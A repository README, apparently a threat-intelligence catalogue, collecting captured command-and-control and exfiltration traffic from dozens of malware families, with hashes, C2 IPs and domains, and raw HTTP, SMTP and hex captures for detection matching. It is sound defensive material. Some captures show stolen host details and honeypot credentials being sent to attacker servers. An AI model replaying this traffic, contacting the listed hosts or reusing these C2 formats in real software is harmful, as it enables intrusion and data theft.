[ { "path": ".gitignore", "content": "\n.DS_Store\n" }, { "path": "README.md", "content": "### A repo for matching on known c2 and exfil traffic keywords (ctrl+f to search)\n\n#### ACBackdoor\nHash: 907e1dfde652b17338d307b6a13a5af7a8f6ced93a7a71f7f65d40123b93f2b8\n\nPcap: (https://github.com/silence-is-best/c2db/blob/master/pcaps/acbackdoor.pcap) and sslkeyfile: (https://github.com/silence-is-best/c2db/blob/master/pcaps/acbackdoor.txt) \n~~~\nPOST / HTTP/1.1\nHost: 193.29.15.147\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\nAccept: */*\nAccess-Control: aW5mbw==\nX-Access: c22ed12456e9eb9844eafe80f3d8c080\nContent-Length: 48\nContent-Type: application/x-www-form-urlencoded\n\nNTI6NTQ6MDA6NEE6QUQ6MjEKV2luZG93cwp4ODZfNjQKMC41\n\nHTTP/1.1 200 OK\nServer: nginx\nContent-Type: text/html; charset=UTF-8\nDate: Mon, 11 Nov 2019 13:55:27 GMT\nContent-Length: 0\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/acbackdoor.png \"ACBackdoor\")\n\n#### AgentTesla\nftp:\n~~~\nTime: 11/25/2019 17:48:57
User Name: admin
Computer Name: USER-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 4095.61 MB
URL:https://www.facebook.com/
\nUsername:honey@pot.com
\nPassword:honeypass356
\nApplication:Chrome
\n
\nURL:192.168.1.1
\nUsername:honey@pot.com
\nPassword:honeypass356
\nApplication:Outlook
\n
\n\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/agentteslaftp.png \"AgentTesla FTP\")\n\nhttp:\n~~~\nPOST /zin/WebPanel/api.php HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)\nContent-Type: application/x-www-form-urlencoded\nHost: megaplast.co.rs\nContent-Length: 308\nExpect: 100-continue\nConnection: Keep-Alive\n\nHTTP/1.1 100 Continue\n\np=G1DZYwdIiDZ6V83seaZCmTT0wiCyOlXVS0OEx4YpkUAOuKO/6hfQJ%2BZD2LjpTbyu9w0gudjYXCIc0Ul74wtsvtqYLYuTR%2BlFVl%2B5deG0RnTTo6nFc1M9tx0%2BRo7WXetRdIHkmVMMSeqH%2BEroM7yttDzosvKfKgB%2BJ07oqT/YvQ6CPNW2%2BCETCU6oIlO9XYyrEy6/hYeF%2BgkfRc9xSEfZhh/7Wk0khJ4zZJ3cjEvXDxJcQWA739/yDUy4kOAndihYsWnLw1mVCHxJSJf7%2BguB9f4DpgX10NLpH\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/agenttesla-http.png \"AgentTesla HTTP\")\n\nsmtp exil:\n~~~\nFrom: office@larbaxpo[.]com\nTo: officelogs@larbaxpo[.]com\nDate: 9 Oct 2019 17:58:19 +0100\nSubject: admin/USER-PC Recovered Cookies\nContent-Type: multipart/mixed;\n boundary=--boundary_0_cac7ba32-e0f8-42d4-8b2e-71d1828e6ff7\n\n----boundary_0_cac7ba32-e0f8-42d4-8b2e-71d1828e6ff7\nContent-Type: text/html; charset=us-ascii\nContent-Transfer-Encoding: quoted-printable\n\nTime: 10/09/2019 17:58:13
UserName: admin
ComputerName: USE=\nR-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Int=\nel(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 3583.61 MB
IP: 18=\n5.183.107.236=0A
\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/agenttesla-submission.png \"AgentTesla Submission\")\n\n#### Amadey\n~~~\nPOST /madapam/index.php HTTP/1.1\nHost: bolsaooma.com\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 77\n\nid=6289217249&sd=MMMMMM&vs=1.43&ar=0&bi=0&lv=0&os=9&av=0&pc=USER-PC&un=admin&\n\nHTTP/1.1 200 OK\nServer: nginx\nDate: Wed, 09 Oct 2019 06:20:09 GMT\nContent-Type: text/html; charset=UTF-8\nContent-Length: 6\nConnection: close\n\n\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/amadey.png \"Amadey\")\n\n#### Arechclient2\n~~~\n....+.{\"Type\":\"EncryptionStatus\",\"Status\":\"Off\"}....&.{\"Type\":\"ConnectionType\",\"ConnectionType\":\"Client\",\"SessionID\":\"191003337\",\"BotName\":\"admin\",\"BotOS\":\"Microsoft Windows 7 Professional \"}....-.{\"Type\":\"SessionID\",\"SessionID\":\"191003337\"}......{\"Type\":\"AfkSystem\"}....).{\"Type\":\"ServerAfkSystem\",\"Status\":\"ok\"}\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/arechclient2.png \"Arechclient2\")\n\n#### Artraloader\n~~~\nPOST /kvs06v.php HTTP/1.0\nHost: onlinejohnline99.org\nConnection: keep-alive\nContent-type: application/x-www-form-urlencoded\nContent-length: 97\n\nSNI=VTFS.QD&UME=Xjoepxt!8!Qspgfttjpobm&OPQ=benjo&IVR=VTFS.QD$$benjoAA11482.572.3314613.96675&st=0\n\nHTTP/1.0 200 OK\nContent-Type: text/html\nContent-Length: 0\nDate: Mon, 26 Aug 2019 21:33:28 GMT\nServer: LiteSpeed\nConnection: close\n\nPOST /Engset.php HTTP/1.0\nHost: hewle.kielsoservice.net\nConnection: keep-alive\nContent-type: application/x-www-form-urlencoded\nContent-length: 126\n\nBCDEF=EFTLUPQ.KHMMKME&MNOPQ=Xjoepxt!21!Qsp&GHIJ=benjo&UVWXYZ=EFTLUPQ.KHMMKME$$benjoAAcc:37f65.f4db.51ge.bf:1.3875452f88:3&st=0\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/artra.png \"Artraloader\")\n\n#### Avemaria, aka ave_maria, warzone rat\n~~~\n 00000000 09 12 3b 42 2d 33 a2 44 fc 01 86 73 ..;B-3.D ...s\n00000000 09 12 3b 42 f7 33 a2 44 fd 01 86 73 69 3d ae 12 ..;B.3.D ...si=..\n00000010 bb c6 19 fd 1a 3a f3 11 c9 ae da 3c 30 bc 38 81 .....:.. ...<0.8.\n00000020 fc 00 0f ca 4e fb 05 c6 de b7 3c 6f 4e 01 a2 87 ....N... ..\n00000060 f1 79 73 5d 9f 1c c4 8e 1a c5 16 20 71 5e 55 06 .ys].... ... q^U.\n00000070 21 7b 8d 35 de 00 25 5d 6f d7 f2 ca a3 ea ef 73 !{.5..%] o......s\n00000080 90 1f 6e 10 d3 b1 0a 56 17 71 3b 48 bd 5c d9 36 ..n....V .q;H.\\.6\n00000090 7e b4 f1 76 46 b8 48 ca 45 1e cd 66 90 d5 67 6b ~..vF.H. E..f..gk\n000000A0 aa b7 98 ed 9d df 7e 36 c0 78 87 6b 56 03 86 67 ......~6 .x.kV..g\n000000B0 1f ed bb 9e e6 78 aa d5 94 e3 0e e2 c0 5e c7 87 .....x.. .....^..\n000000C0 57 60 34 e4 06 ea 10 ae 6e 38 c3 ca af 01 e2 2c W`4..... n8.....,\n000000D0 ea d4 26 f9 3a 05 83 f7 aa 59 db 01 f5 2b 40 1e ..&.:... .Y...+@.\n000000E0 74 28 36 1f ac 03 t(6...\n 0000000C 09 12 3b 42 2d 33 a2 44 dc 01 86 73 ..;B-3.D ...s\n000000E6 09 12 3b 42 29 33 a2 44 eb 01 86 73 bc 8d c4 e7 ..;B)3.D ...s....\n 00000018 09 12 3b 42 5d d9 a2 44 e2 01 86 73 bc 8d c4 e7 ..;B]..D ...s....\n 00000028 ca 69 41 01 ab 12 30 ff ae 64 2d 93 dc 65 53 9b .iA...0. .d-..eS.\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/avemaria.png \"Avemaria\")\n~~~\ncon|1597172877123|285|ZTkyNGVhNzkxMjU1N2RlZHxKT05BVEhBTi1QQ1xKb25hdGhhbnwpMiBEdW8gICAgIFQ3NzAwICwgU3RhbmRhcmQgVkdBIEdyYXBoaWNzIEFkYXB0ZXJ8V2luIDcgICh4NjQpfFRXVm5ZVVIxYlhCbGNpQXhMakFnWW5rZ1EyOWtaVU55WVdOclpYSWdMeUJUYmtRPXwwZCAwaCAwbSAwc3w3NjZ8LXwwfDQgR2lCfE4vQXwyMzA0fDE5Mi4xNjguMTAwLjEwMXwxfC0xfERlZmF1bHQ=@\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/avemaria2.png \"Avemaria\")\n~~~\n 00000000 17 69 89 31 17 60 ba b0 02 23 a9 79 .i.1.`.. .#.y\n00000000 17 69 89 31 ab 60 ba b0 03 23 a9 79 ba 5d bb 30 .i.1.`.. .#.y.].0\n00000010 0f 57 5c a6 38 ca da 21 2a 61 66 45 19 f7 7f c6 .W\\.8..! *afE....\n00000020 58 09 d3 89 cd 36 fe 88 43 f9 a3 33 40 f7 84 1c X....6.. C..3@...\n00000030 19 47 dd 80 1c f2 e0 a4 8b af b9 f1 f7 25 53 48 .G...... .....%SH\n00000040 69 a0 32 da c8 1d 3e 07 38 44 3d 5d d6 e8 79 c8 i.2...>. 8D=]..y.\n00000050 aa ff bc d4 11 48 8d 9b b2 6a 8e 7b 9a 9c b7 da .....H.. .j.{....\n00000060 b5 fb d6 74 f1 e3 48 88 db 08 bf bf dd d8 a3 3a ...t..H. .......:\n00000070 11 c0 4c 98 8d 0e f7 4f 2a 1d 19 12 25 dd ff 72 ..L....O *...%..r\n00000080 69 6e 43 c3 db 76 a1 05 2b 6b ef b6 29 8d 52 88 inC..v.. +k..).R.\n00000090 db 6e 9b 5b 77 e0 34 57 33 79 7b 95 72 60 65 cb .n.[w.4W 3y{.r`e.\n000000A0 f7 38 3c f0 12 82 d6 1c 71 12 f7 26 e3 1a b9 49 .8<..... q..&...I\n000000B0 c8 eb 46 0f 54 cb f0 35 9c 3e 4d 08 7b 9f 4b 72 ..F.T..5 .>M.{.Kr\n000000C0 d5 c3 27 da 27 51 47 de ..'.'QG. \n 0000000C 17 69 89 31 17 60 ba b0 2a 23 a9 79 .i.1.`.. *#.y\n 00000018 17 69 89 31 5f 60 ba b0 20 23 a9 79 79 fa d3 d9 .i.1_`.. #.yy...\n 00000028 1d 44 2c 26 8a c9 f5 58 76 a2 3e f6 1c 79 65 06 .D,&...X v.>..ye.\n 00000038 23 08 a7 89 d7 34 8c 88 36 f9 ca 33 35 f7 aa 1c #....4.. 6..35...\n 00000048 72 47 b9 80 3f f2 c1 a4 e7 af 97 f1 db 25 31 48 rG..?... .....%1H\n 00000058 4a a0 14 da ab 1d 4e 07 57 44 7e 5d 42 a2 a0 0b J.....N. WD~]B...\n 00000068 2d f8 d9 d4 -...\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/avemaria3.png \"Avemaria\")\n\n#### Azorult\nPOST retrieve method, unique pattern with lot's of '/' and ')'\n~~~\nPOST /index.php HTTP/1.1\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\nHost: 51.38.76.57\nContent-Length: 103\nCache-Control: no-cache\n\nJ/.8/.:/.O.(8.I/.>/.9/.>K.>8.N/.I/.;/.:.NL.?N.>8.(9.L/.8/.H.(9.(9.(9.(9.I\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/azorult.png \"Azorult\")\n\n#### Backstage aka Powerkatz\nHash: b4e270dce231fd01c326f0828a3c5ad80012ebb932842aa8e420575859406fac\n\nPcap: (https://github.com/silence-is-best/c2db/blob/master/pcaps/backstage.pcap)\n~~~\nPOST /index.php/api/fb HTTP/1.1\nConnection: Keep-Alive\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\nContent-Length: 933\nHost: www.wdsfw34erf93.com\n\ndata=aHpyTUxwSW1cNTw0ZXFVTV1GTDlMRkxsT0RyTUxwSXZlSUVraFo0b2VxVVFdW1VyZTVVfUxtcmpMbEx2RmpubFw1PHlkNW9vVnFReWVsTDlMRk1lW0o4Z0xJe3hMbHpORlZNcFxxWX1dW016XFtRfUxtcmpMbEx2RmpubF1xTXNdWjhuZjM4NGVWTDlMRkx6TGx6TkZWTXBmcDx3TG1yakxwWTddVkx2RmpubGRKSX1WSjx3XVlFa101WGxSbERsUEZMdkZqbmxkWjh9XDU8eWQ1b29WcVF5ZWxMOUxGTWVbSjhnTEl7eExsek5GVk1zZXFRNGY1WXxmSkl9ZnxMOUxGTGxPRHJNTHBvfVRwM2xSbERsTGx6TkZWTXNmM1FyZnA8d11YWTdkW1EzTG1yakxtSGxPRHJNTHBvfVdKPHFkWjhvXUZMOUxGTHpMbHpORlZNc2Y1b3hmNlVrZUp6bFJsRGxQRkx2RmpubGU1TXRYNm99Vlo4cGV8TDlMS3ZORlRubF1wb3xmNlVMXUpVV11bTXNcWntSZ1o0bF1bTGxSbERsUUpUNFBXUHpQfUR9UEdQelBtRH1QV0x6UG1EfFBHTHpQbUR8UEdMelBtRHxQR0x6UG1EfFBGTHZGam5NTHA0a1w2UGxSbEVlRmpuTUZWTDRQbXI0UUdyelBHcntQfXI3UX1yelFWTGpGam5NW1Z6TkZUbmxmNm99Z0pZd1lwWXxmNW95ZWxMOUxGTVtkWjhuZTZnfVE0UVRQWDx8VTZNb1xbVW9mbEVHZUpvb2VxVGxMRHJNaVZ6TkZWTXpcW29NZXBdeUxtcmpMbEx2RmpubGZwSXhdRkw5TEZMe1F9ajdRfEx2RmpubGdab25MbXJqTG1MelFsTHZGam5sZ3BZfGY1b3llbEw5TEZMNUxsRE5pVkRO\n\nHTTP/1.1 200 OK\nDate: Wed, 23 Sep 2020 12:30:29 GMT\nServer: Apache\nUpgrade: h2\nConnection: Upgrade, close\nVary: Accept-Encoding\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=UTF-8\n\naHxNfWdKSTNnW1BsUm1JPA==\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/backstage.png \"Backstage\")\n\n#### Bandook RAT\n~~~\n00000000 64 4f 7a 54 30 46 72 56 44 51 4c 30 6f 32 49 48 dOzT0FrV DQL0o2IH\n00000010 6f 70 46 6c 31 69 37 48 4c 35 48 48 54 4f 6e 66 opFl1i7H L5HHTOnf\n00000020 6f 30 55 72 6a 47 7a 48 30 61 30 4f 62 54 37 69 o0UrjGzH 0a0ObT7i\n00000030 45 42 64 2b 54 4e 6a 4f 72 77 74 44 6d 4c 57 52 EBd+TNjO rwtDmLWR\n00000040 59 54 68 6f 36 6b 4c 2f 42 38 33 43 4d 75 49 2b YTho6kL/ B83CMuI+\n00000050 6e 34 46 5a 55 66 49 4a 2f 70 6e 31 32 6a 62 73 n4FZUfIJ /pn12jbs\n00000060 4c 2f 4c 79 54 73 42 73 76 63 48 66 6e 6b 4a 53 L/LyTsBs vcHfnkJS\n00000070 5a 6a 6b 4b 59 34 2b 54 4b 48 44 76 6c 54 32 52 ZjkKY4+T KHDvlT2R\n00000080 59 57 69 59 4a 70 54 48 6d 70 68 4f 70 51 4d 47 YWiYJpTH mphOpQMG\n00000090 6d 77 3d 3d 26 26 26 mw==&&&\n 00000000 64 4f 7a 54 30 46 6f 3d dOzT0Fo= \n00000097 64 4f 7a 54 30 46 76 56 44 51 3d 3d 26 26 26 dOzT0FvV DQ==&&&\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/bandook.png \"Bandook\")\n\n#### Bazaloader/Bazabackdoor\n~~~\nGET /pool/job/priority/normal HTTP/1.1\nCookie: HSID=u4EATrsU%2BccZ%2F317LbjgmA6QPLukoI06IX0jiIvsbHOtjThVcMc92Dn08M2eDuWDH3MXcwNO6x4HFg0uhoT3p5tzHh28ab1XyEHdCk4GpfRVj4fFDrtCYi0Z7sk59slweik4TdcpZ4MQqVDfR7i8JaXDN3lfmAVyp9wV34FGGWkgTSFVeGGwKIGhd%2BLkkCWtoMEDoB1YCQHNbEGIlQRAcdKu1uPCDJzOnFivkkiS71IUUX2LacOB1rJ4404HcKP8NmivQ10vy9KBA6uURsQt77zwUX5aicItO3YXJ6HD67TIVa5jhVBlYi1YMJ35SVCbxrFOudvjK23gUjwPFswweQ%3D%3D;SIDCC=t1vgfZ5T9hmjM2bXEHqETxQJ%2FD6%2FO8Ni273vVwk0WctwmufD6uy%2FovmzIi349CWnTEkov0mEC8GyV5nN4fVxwHY1uHsACM5Kc4tfTzwuwN1%2F0h5aMXEBX1whQXEkw4YqIYuRI8KVICQyLmDi%2BjFQoZwzvRbyJpaoHrCalnA1ezNYvJwlt3XbytQL%2BJOR3%2FJ%2FzCfBIxzBTN7%2BwE04D03ROPBs3B8IE53QrE5%2BMQP8Jv6kI74o8%2BsJS5W29bMn01WV49OAdfMlzMKZquOoBC4zvSuaZU5tpNkPwPJJLeUaXEnuAyNSxj7uDJNdM0jkIb%2FhokOijY77%2FRe2YjrfjaofeQ%3D%3D;SID=uSFINuTAOqFt2EPgZrdxIDpmVT0LFTCzEnYCzNVuvjeHwTBqJoL7hyueBhvQPeiMI6Nmu4bXbTrdBfx6xK49K%2BmDMRaftQ%2BPJXDoiVMrab3IPnD9SEffK9OONpXj8FfDX%2FRFrzgLPd0XtGuT9L0jMQSoV4ztrGpcqZ54K1E4Sg28YfuvG31rUZvgtlktnMEh%2FvxkOrPX3z%2Fx1EwTmXLaumiweiKkhAT4ZBrqgG5bf%2FGP%2Bof9hoY8te34a4Zfs9gJxzq0ZqO9KRQf66al%2BGKGIPzcR2hIhPjG1JfqTAYb5OYxVSgMCDViAV3lSuR0vou0KAvsbk650gwGQPLSJWJHVw%3D%3D;SSID=39cuio0XzqpWy0DLG4NZ9X1ZMTAf29t378zdWUbCKP81IPRp4HMFojBN6OZn%2B1sSaPpNWiCiX6GUC5dwNwGhOIs1RUN0eLQYmLADWX290GSSm62UmtD5WrV85WV5iOLJEsXiYIbNdYKQ%2BHpZHDzSfY5%2BzCsghZYIi3FCR96tUt9gJxGB4jEMSUzhtNDCEQyvx4H906IG2s7dmA8WbJA%2B0nZ9rCH6u5%2FpQfwM9DFxiELNl4wvEGGz1L%2BBtRrYKkPfULuPKjACSkdo86GJuCbgxVDVBlboB3F7fyvJt2OwwMeK77hYqhgryk3K%2BJnRQgDntdgR4H8MMSBgI9vVnaFvYA%3D%3D;\nX-Tag: gz7XdHGoT%2FJKHRjpIamqqoB1AGoy3qdIedXMY5OWHeizgooQ%2BXMI1BHsqRgAobELwQbdqjEONQBZSbXe2hni0t4YDbKmvjrX3%2BRBiPD3u6kO6UWdSRmXR17Ixb6yU3qT3LoJBGcU%2FQA9pwudVzaAVyQA3BkziY6qLdqeo4ZFaNBYTubbPZZhiOELF6UdCa22VYyzIYBSC0pxN8l4itAKsrQL%2FVjxKAXj1SDOyK4DLFgNae%2Fqs0MvckMO2xUEVucj8cI2UMRTJ73ZFJ05REyx%2ByOX83q6qu%2FrV4DM1IxuQDw8h4CMb56EZgY4yeDIrumVGz7LqX1jxb38KADWnBUbfw%3D%3D\nX-Csrf-Token: rykCu%2BVHJ2bEINA3xxHcfV2w7cRN6ZUaQJWyTdqK0CUQU0rXSZNMUG7Z5ve5o14t0lrePa4eYZVcAtpMlDJpIOMCa3Lk2qaleYNHaQM8%2F41wtLEo5SozmFoUeqRi9f%2BXnWxYr3vzdx3XpRGqkCWXTKuyIE%2BSwDyX7yvuxXjHWaf4qak%2FQ6Uz4NMcDnMwFiKwxLkIk2X%2FK16znremUZ0qP0HaoWjl3%2F5k7zVDBWuU%2FZahGvms4QQxkpAdKT5yFQT9OYz8M52hGRAAWR%2FEDy8hqLK2b2po3YfP3YF%2FM2yNi4uLq%2FP%2BDKEA9i0nEKKe%2BrLf%2BpUjpZ%2Fl5jbeolIOH0bZNg%3D%3D\nX-Request-ID: k54ZVOB5jq2e2LHM6gvpHzLleRRD68OXJsJFZLG4cOG5hjWDtf2BIk%2BKrd2RlZDnrcYBjLAGGchBQl9G4CNZFDi4dizDjbTHTo6acwxaJHSuq54M6aL4YpIzkziT4F%2FSAcrnqoxwF5Vy%2BBurRUzVpIIArTbpcN7WSO%2BANlBUayw7nW6MUZ0PtCHQXxlTgt5qGcBqn9IlsFeQtwyRa1TgA2FXTYVWJHm923yDurCV0CmkI0qTI2GujJWG5OcAZqqhwGHmCmxZDMONv248RGjGSHeDibSGbGDxah6rRqKqg4vx9YDFR92dx7iEyWeQhSMkHQnc0JV%2FC0thtgmkjj68Sg%3D%3D\nHost: 195.123.211.5\n\nHTTP/1.1 200 OK\nServer: nginx/1.10.3\nContent-Type: application/json; charset=UTF-8\nContent-Length: 2\nConnection: keep-alive\nDate: Thu, 24 Jun 2021 19:26:18 GMT\nSet-Cookie: DV=5ssdw9_D40TpEC3m\nSet-Cookie: fr=312725\nSet-Cookie: NID=Ca2zDxRCiyvVM6sKhctvLJ2Vrys8Ld2uuXrfUhxg5JW00EZxGAyJooDyiky8504Oh_hZSHzfzOYLt_JEjY0VvGN-jnKRWLL-EZxdCPhDH937LrOkqwduARCJFTf4Onb49DNYiV5EYKD2cXAOhZl8hukrtGjHqtPrQD6en3BFOpws4X4pFBXz53RPD8lmRLcmLXWws3qrKoyJo8A_eFuUABvqvA7eJTJZ7dZO3NIRC1oZixRhdNytbVzI1PFJOQBY\nSet-Cookie: datr=b4n4l%2BdMcUiAk3BgfGSx3CvY5IBMiR%2Fz0LdmGzvzAULKDgDHLpUbf6eH8AAwBG5q5IjuegyO0LPkEZRCqmiPKM9OvVT9eBEiG7RX9Yn%2FN1v43Km09B9fvjxOau6QEfOUzPjazm%2FdRhkTTEA4Q28oe8neeqRwVpH7PTRp0%2BzWPNxjv1uNhfPls1Iq%2B97zGmNxeKcGvE3mFaQPuuMif%2FzN5Hltrm56QnnfyEJ6PDvC8FdJS%2B4Tdasn3VpV1CXKXYvcFvb5kVkQnuqvXF3a6hlx1BZXQQsK8Ls3p6Q0lZO1VgnstYpKccmW7QEekMs5USUUyE2ZDZOyunRod%2Bmci5ePzQ%3D%3D\nSet-Cookie: SID=433278\nSet-Cookie: HSID=750848\nSet-Cookie: SNID=FwxJ05MkOfvPjHLjx6_ECANXTqnfF4KazSvYfbsQxuDqwnRw3sQ6-ziG9cSOdz4PyizA1Q6eTWM7xRHA3NOE7Lcl8F7ulbBRjRdUtZc5WDn0_DSHjyYIReH0O0bJOtVgLaRhNa6lrQqJPl36FUfacLEbEQ5qX7X8tXf4t216rGOxVdPI075mn6YSPT_boPA2CMcGphwO6Voz1telbeiu__Y7weWCii9xW_YtYdCK5P8PNMhN7fZvvkmTKcP0e-aw\nSet-Cookie: CGIC=cdXhUoYzwvog7mCeJBtGk9ntKIXXtJNmxhbrvLXvvKW2T_v7LPVGISh_UA\nSet-Cookie: SSID=false\nSet-Cookie: stamp=192153\nVary: Accept\n\nOK\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/baza.png \"Bazaloader\")\n\n#### Betabot\n~~~\nPOST /forum3/logout.php HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: russk9.icu\nContent-Length: 664\nCache-Control: no-cache\n\nbcjkr=386731&dgpsben=2019162b8cf358952f71fa238d6ecbcd6c424d692427445f&fkvalqbgr=C27431FCDE2C51BA6EA493FEAB76CE9BE2812C592CBADEEC4495BC94DDE1882E969102B5A9939B43816D8DA17AC2C05A575A4FC03B11D0C9614BE38ABB6B7F57984A1EC6D101BF290C06DC4C3093B6B165ACAEF8C9EFE3099C11D2106C16EFFD27888EB24A03E0CDE4935AAB53FD212683FF45CAE1BF47F2C343D602E10C79E49B74E6FE10469501A63C762A089446AC9A1C5A802C80071E11058065B5C481D0DB2E6B0AC9A7461DE3DA4792CC86A6E072080ACCB527BB0D97D7C91874B8754068C71AD56502B1A03279A280EF9E705E25193C82A93B220B4B1A63FD8B93EF2B528AF5EB5A00E4234CF1744FA96A05937E7B41D4B82B3997203F0ABCBFC2C49245E56DED2DF1941DA739C6F9C7C3E30C93A136705F3574F34C74E6DE2AD09C9BFA616F4C\n\nHTTP/1.1 200 OK\nServer: nginx/1.16.1\nDate: Mon, 28 Oct 2019 23:47:58 GMT\nContent-Type: text/html\nTransfer-Encoding: chunked\nConnection: keep-alive\nX-Powered-By: PHP/5.5.38\n\n..._...+...<.f........}..........?...yg.4.....#.Q...p...1yy.u..N?.ueg.v....EO......K.:....R.]......zv...3@j..\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/betabot.png \"Betabot\")\n\n#### BitRAT\nHash: 9e11c859c27b3696188e8b9ad95513dcc0a61980232dc4bf455df5d6f4454e46\n~~~\ncon|1601670957699|281|MTE0NGRlZjhiNzc4ODM5ZXxKT05BVEhBTi1QQ1xKb25hdGhhbnwpMiBEdW8gICAgIFQ3NzAwICwgU3RhbmRhcmQgVkdBIEdyYXBoaWNzIEFkYXB0ZXJ8V2luIDcgICh4NjQpfFFXUnRhVzVwYzNSeVlYUnZjam9nUTI5dGJXRnVaQ0JRY205dGNIUT18MGQgMGggMG0gMHN8MTEwfC18MHw0IEdpQnxOL0F8MjUxNnwxOTIuMTY4LjEwMC4xMDF8MXwtMXxEZWZhdWx0fDEuMzA=@\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/bitrat.png \"Betabot\")\n\n#### Bitter RAT (Patchwork)\n~~~\nGET /ourtyaz/qwe.php?TIe=%3a116%3ad48.2431.52b5.c69e.3c86b%3a961e3g*Vtfs.QD*%3aACme%3b%217%2f2%2f8712%21Tfswjdf%21Qbdl%212 HTTP/1.1\nHost: frameworksupport.net\nConnection: close\n\nHTTP/1.1 200 OK\nContent-Type: text/html; charset=UTF-8\nContent-Length: 74\nDate: Sat, 12 Jan 2019 02:44:27 GMT\nAccept-Ranges: bytes\nServer: LiteSpeed\nConnection: close\n\n90059c37-1320-41a4-b58d-2b75a9850d2f 78.109.23.2 User-PC EXE: ##\nSIZE: ##\n\nAXE: ##\nSIZE: #45#SRE: ##\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/bitter.png \"Bitter RAT\")\n\n#### Bladabindi aka nJrat\n~~~\n147.ll1990MURFTUFZT19DNEJBMzY0Nw==1990USER-PC1990admin199018-03-2619901990Win 7 Professional SP1 x861990No1990N/A1990..1990UHJvZ3JhbSBNYW5hZ2VyAA==1990123.inf1990MURFTUFZTw0KMWRlbWF5by5kdWNrZG5zLm9yZzoxOTkwDQp2NC4wLjMwMzE5DQpSZWdTdmNzLmV4ZQ0KRmFsc2UNCkZhbHNlDQpGYWxzZQ0KRmFsc2U=15.CAP199035199023926.CAP1990......JFIF.....`.`.....C...........\t\t.\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/njrat.png \"Bladabindi - nJrat\")\n\n#### Blacknet\n~~~\nGET /black/BlackNETPanel/receive.php?command=UGluZw==&vicID=SGFjS2VkX0M0QkEzNjQ3 HTTP/1.1\nHost: meublesinde.in\n\nHTTP/1.1 200 OK\nDate: Fri, 17 Jan 2020 19:49:47 GMT\nServer: Apache\nX-Powered-By: PHP/7.1.33\nUpgrade: h2,h2c\nConnection: Upgrade, close\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=UTF-8\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/blacknet.png \"Blacknet\")\n\n#### Blackrat aka blackremote\n~~~\n9.............................>Clientx, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null......ProClient.Data.....data.bytes.............102622021F20414A5644044411072A755821285E472B1826013113651A28101927225D5B1037185F69394B2911291A1A3F031C113F696C1442754978280A031673281879480C2843582C0B032E41737D7E5B5C7A0F7C0D7521\n...............................>Clientx, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null......ProClient.Data.....data.bytes...........\"1A3A0F03142D5055131F585605383F4051\n\n...............................J2085182040988060201, Version=1.0.7.0, Culture=neutral, PublicKeyToken=null.....\nBlackRAT.Data.....data.bytes...........(102622021F20415F0818765B27312642512C3103\n...............................J2085182040988060201, Version=1.0.7.0, Culture=neutral, PublicKeyToken=null.....\nBlackRAT.Data.....data.bytes............123C3803363F73570B0552\n..$............................J2085182040988060201, Version=1.0.7.0, Culture=neutral, PublicKeyToken=null.....\nBlackRAT.Data.....data.bytes.............16310D190E2C4918020E52\t..........$...MZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/blackrat.png \"Blackrat\")\n\n#### Borr\n~~~\nHTTP/1.1 100 Continue\n\nPOST /Auth/index.php HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nHost: 92.63.197.188\nContent-Length: 203\nExpect: 100-continue\nConnection: Keep-Alive\n\ntype=login&username=n3L9rdjJe47G%2bCRzL%2fTwmQ%3d%3d&password=n3L9rdjJe47G%2bCRzL%2fTwmQ%3d%3d&hwid=lsd&session_id=ejQ5U3JwREpZV0k4d21DTU85WHdlTXVTN2lEQ2hkMzI%3d&session_salt=ejQ5U3JwREpZV0k4d21DTQ%3d%3d\n\nHTTP/1.1 200 OK\nDate: Thu, 30 Jan 2020 01:53:02 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Length: 24\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text/html; charset=UTF-8\n\nZZRTKdEbowHH5njhG6UW5w==\n\nGET /gate.php 